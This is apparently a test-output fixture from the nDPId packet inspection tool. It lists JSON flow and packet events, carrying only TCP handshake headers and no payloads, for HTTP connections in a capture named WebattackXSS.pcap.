-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":3,"flow_last_seen":1499347257225,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347257225,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0MIVAAD4GlVOsEAABwKgKMtfiAFCgDzIq5j1EfIAQAOVN2AAAAQEICgE6Aq0D49Qj"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347258474,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347258474,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55280,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2421,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87xpAAD4G1rWsEAABwKgKMtfwAFBQ0ez\/AAAAAKACchBD0wAAAgQFtAQCCAoBOgPlAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2422,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":2,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347258474,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/Cr4O+wUNHtAKAScSDP4AAAAgQFtAQCCAoD49VcAToD5QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2423,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":3,"flow_last_seen":1499347258474,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347258474,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07xtAAD4G1rysEAABwKgKMtfwAFBQ0e0Aq+DvsYAQAOVu5wAAAQEICgE6A+YD49Vc"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347259759,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347259759,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55294,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2433,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Xl9AAD4GZ3GsEAABwKgKMtf+AFDARlt4AAAAAKACchBklQAAAgQFtAQCCAoBOgUnAAAAAAEDAwc="} 
-00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2434,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":2,"flow_last_seen":1499347259759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347259759,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1\/6Hgb3OwEZbeaAScSBFowAAAgQFtAQCCAoD49adAToFJwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2435,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":3,"flow_last_seen":1499347259760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347259760,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XmBAAD4GZ3isEAABwKgKMtf+AFDARlt5h4G9z4AQAOXkqgAAAQEICgE6BScD49ad"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347262289,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262289,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55320,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ic9AAD4GPAGsEAABwKgKMtgYAFBS2I5QAAAAAKACchCcmQAAAgQFtAQCCAoBOgefAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2452,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":2,"flow_last_seen":1499347262289,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347262289,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2BhB\/tqnUtiOUaAScSCj2QAAAgQFtAQCCAoD49kVAToHnwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2453,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":3,"flow_last_seen":1499347262290,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347262290,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0idBAAD4GPAisEAABwKgKMtgYAFBS2I5RQf7aqIAQAOVC4QAAAQEICgE6B58D49kV"} 
-00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347134702,"flow_last_seen":1499347140651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347137239,"flow_last_seen":1499347142652,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54000,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347138552,"flow_last_seen":1499347143653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54014,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347141111,"flow_last_seen":1499347146653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54040,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347142412,"flow_last_seen":1499347147653,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54054,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2460,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347143676,"flow_last_seen":1499347149654,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347262689,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54068,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347263542,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347263542,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55334,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8VDNAAD4GcZ2sEAABwKgKMtgmAFA8SlzqAAAAAKACchDjRQAAAgQFtAQCCAoBOgjZAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2464,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":2,"flow_last_seen":1499347263542,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347263542,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2CaW4NetPEpc66AScSCXYwAAAgQFtAQCCAoD49pPAToI2QEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2465,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":3,"flow_last_seen":1499347263543,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347263543,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0VDRAAD4GcaSsEAABwKgKMtgmAFA8SlzrluDXroAQAOU2awAAAQEICgE6CNkD49pP"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347264804,"flow_last_seen":1499347264804,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347264804,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55348,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2476,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1499347264804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264804,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NPtAAD4GkNWsEAABwKgKMtg0AFDy7j7vAAAAAKACchBJUwAAAgQFtAQCCAoBOgoUAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2477,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":2,"flow_last_seen":1499347264805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347264805,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2DSLlcK98u4+8KAScSAccQAAAgQFtAQCCAoD49uKAToKFAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2478,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":3,"flow_last_seen":1499347264805,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347264805,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NPxAAD4GkNysEAABwKgKMtg0AFDy7j7wi5XCvoAQAOW7eAAAAQEICgE6ChQD49uK"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347266097,"flow_last_seen":1499347266097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347266097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2487,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":1,"flow_last_seen":1499347266097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8FmFAAD4Gr2+sEAABwKgKMthCAFDvjR02AAAAAKACchBtHAAAAgQFtAQCCAoBOgtXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2488,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":2,"flow_last_seen":1499347266098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347266098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ELPgbsz740dN6AScSAClAAAAgQFtAQCCAoD49zOAToLVwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2489,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":175,"flow_packet_id":3,"flow_last_seen":1499347266098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347266098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0FmJAAD4Gr3asEAABwKgKMthCAFDvjR03z4G7NIAQAOWhmgAAAQEICgE6C1gD49zO"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347267376,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347267376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2496,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":1,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8e\/BAAD4GSeCsEAABwKgKMthQAFA8R3dnAAAAAKACchDE4wAAAgQFtAQCCAoBOgyXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2497,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":2,"flow_last_seen":1499347267376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347267376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2FDz+hz2PEd3aKAScSDS4AAAAgQFtAQCCAoD494NAToMlwEDAwc="} 
-00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2498,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":176,"flow_packet_id":3,"flow_last_seen":1499347267377,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347267377,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0e\/FAAD4GSeesEAABwKgKMthQAFA8R3do8\/oc94AQAOVx6AAAAQEICgE6DJcD494N"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347268659,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347268659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2508,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":1,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83S9AAD4G6KCsEAABwKgKMtheAFDSkdD3AAAAAKACchDTuQAAAgQFtAQCCAoBOg3YAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":2,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347268659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2F43lkso0pHQ+KAScSBuqAAAAgQFtAQCCAoD499OAToN2AEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":177,"flow_packet_id":3,"flow_last_seen":1499347268659,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347268659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03TBAAD4G6KesEAABwKgKMtheAFDSkdD4N5ZLKYAQAOUNsAAAAQEICgE6DdgD499O"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2529,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":178,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347271162,"flow_last_seen":1499347271162,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347271162,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
